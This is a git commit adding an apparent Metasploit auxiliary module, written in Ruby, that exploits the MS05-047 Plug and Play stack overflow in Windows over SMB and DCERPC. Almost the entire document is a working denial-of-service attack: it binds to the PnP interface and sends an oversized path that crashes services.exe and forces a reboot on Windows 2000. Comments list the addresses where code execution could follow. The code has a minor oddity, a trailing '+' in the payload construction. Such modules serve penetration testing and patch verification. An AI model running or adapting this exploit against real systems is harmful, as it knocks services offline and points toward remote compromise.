DoS only module for MS05-047

git-svn-id: file:///home/svn/framework3/trunk@4164 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2006-12-03 23:35:41 +00:00
parent 840606766f
commit c09bb4c04a
1 changed files with 108 additions and 0 deletions

View File

@ -0,0 +1,108 @@
require 'msf/core'
module Msf
class Auxiliary::Dos::Windows::Smb::MS05_047_PNP < Msf::Exploit::Remote
include Auxiliary::Dos
include Exploit::Remote::DCERPC
include Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Plug and Play Service Registry Overflow',
'Description' => %q{
This module triggers a stack overflow in the Windows Plug
and Play service. This vulnerability can be exploited on
Windows 2000 without a valid user account. Since the PnP
service runs inside the service.exe process, this module
will result in a forced reboot on Windows 2000. Obtaining
code execution is possible if user-controlled memory can
be placed at 0x00000030, 0x0030005C, or 0x005C005C.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 3878 $',
'References' =>
[
[ 'CVE', '2005-2120' ],
[ 'MSB', 'MS05-047' ],
[ 'BID', '15065' ],
[ 'OSVDB', '18830' ]
]
))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
], self.class)
end
=begin
/* Function 0x0a at 0x767a54a8 */
long function_0a (
[in] [unique] [string] wchar_t * arg_00,
[out] [size_is(*arg_02)] [length_is(*arg_02)] wchar_t * arg_01,
[in,out] long * arg_02,
[in] long arg_03
);
=end
def run
# Determine which pipe to use
pipe = target['Pipe'] ? target['Pipe'] : datastore['SMBPIPE']
print_status("Connecting to the SMB service...")
connect()
smb_login()
# Results of testing on Windows 2000 SP0
# 324 / 325 exception handled
# 326 write to 0
# 327 jump to 00000030
# 328 jump to 0030005C
# 329 jump to 005C005C
# Completely smash the process stack
i = 1024
handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
path = "HTREE\\ROOT" + ("\\" * i)
# 0 = nil, 1 = enum, 2/3 = services, 4 = enum (currentcontrolset|caps)
stubdata =
NDR.long(rand(0xffffffff)) +
NDR.wstring(path) +
NDR.long(4) +
NDR.long(1) +
print_status("Calling the vulnerable function...")
begin
dcerpc.call(0x0a, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_good('Server did not respond, this is expected')
rescue => e
if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
print_good('Server disconnected, this is expected')
else
raise e
end
end
disconnect
end
end
end